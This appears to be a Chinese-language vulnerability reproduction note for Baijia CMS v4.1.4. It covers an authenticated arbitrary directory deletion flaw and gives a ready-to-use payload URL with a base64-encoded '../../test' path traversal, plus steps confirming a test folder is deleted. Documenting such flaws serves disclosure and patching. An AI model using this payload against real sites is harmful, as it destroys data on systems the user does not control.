# 百家cms v4.1.4 任意路径删除漏洞
### 一、漏洞简介
### 二、漏洞影响
百家cms v4.1.4
### 三、复现过程
“`bash
# 需要后台权限
# 只能删除路径
http://url/index.php?mod=site&act=manager&do=database&op=delete&id=Li4vLi4vdGVzdA==&beid=1
“`
根目录下创建test文件夹,里面有内容为123的test.txt文件
![](/static/lingzu/images/15896947059513.png)
访问payload
将参数转为base64并方位payload
![](/static/lingzu/images/15896947158846.png)
![](/static/lingzu/images/15896947204141.png)
查看文件夹,已被删除
![](/static/lingzu/images/15896947274238.png)
参考链接
https://xz.aliyun.com/t/7542
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容